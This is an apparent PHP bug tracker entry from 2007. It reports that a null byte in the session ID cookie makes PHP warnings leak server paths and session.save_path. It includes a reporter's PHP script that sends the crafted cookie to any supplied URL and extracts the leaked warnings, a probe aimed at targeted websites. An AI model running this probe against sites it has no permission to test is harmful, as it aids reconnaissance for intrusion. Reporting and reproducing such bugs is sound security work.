#42310 [Opn->Fbk]: Information disclousre when using invalid symbol in the session id

[jani]

 ID:               42310
 Updated by:       [EMAIL PROTECTED]
 Reported By:      astalor at gmail dot com
-Status:           Open
+Status:           Feedback
 Bug Type:         Session related
 Operating System: ALL
 PHP Version:      5.2.4RC1
 New Comment:

Please try using this CVS snapshot:

  http://snaps.php.net/php5.2-latest.tar.gz
 
For Windows (zip):
 
  http://snaps.php.net/win32/php5.2-win32-latest.zip

For Windows (installer):

  http://snaps.php.net/win32/php5.2-win32-installer-latest.msi




Previous Comments:
------------------------------------------------------------------------

[2007-08-15 13:28:54] astalor at gmail dot com

Description:
------------
If you put invalid symbol in the session ID and PHP warnings are turned
on you can retrieve information about files and paths on the server and
also in some cases the configured session.save_path variable from
PHP.INI, this can display warnings (and sometimes break pages that count
on redirection with header()) on pages that are perfectly correct and
without any errors in them.

Reproduce code:
---------------
<?php
/* This script check if PHP warnings are enabled for the targeted
website */
function checkWarnings($url) {
        $ch = curl_init ();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 2);
        curl_setopt($ch, CURLOPT_COOKIE,"PHPSESSID=\0");
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER , 1);
        $output = curl_exec($ch);
        curl_close($ch);
        
        preg_match_all("/<b>Warning<\/b>:(.*)<br \/>/i",$output,$match);
        preg_match_all("/session.save_path is correct
\((.*)\)/i",$output,$path);
        #echo $output;
        echo "<pre>";
        echo "Checking <b>$url</b>\n";
        if (count($match[0]) > 0) {
                echo "<b>Warnings found</b>:\n";
                echo implode("\n",$match[0]);
        } else {
                echo "Warning are <b>disabled</b>\n";
        }
        if ($_GET['debug'] == 1) {
        echo "<b>Displaying page:</b>\n";
        echo $output;
        }
        #print_r($path);
}
checkWarnings($_GET['url']);
?>

Expected result:
----------------
Warning:  session_start() [function.session-start]: The session id
contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,'
in /home/user/public_html/main/file.php on line 32
Warning:  Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (/tmp) in
Unknown on line 0


Actual result:
--------------
the same as the expected result, as long as the PHP warning are enabled


------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=42310&edit=1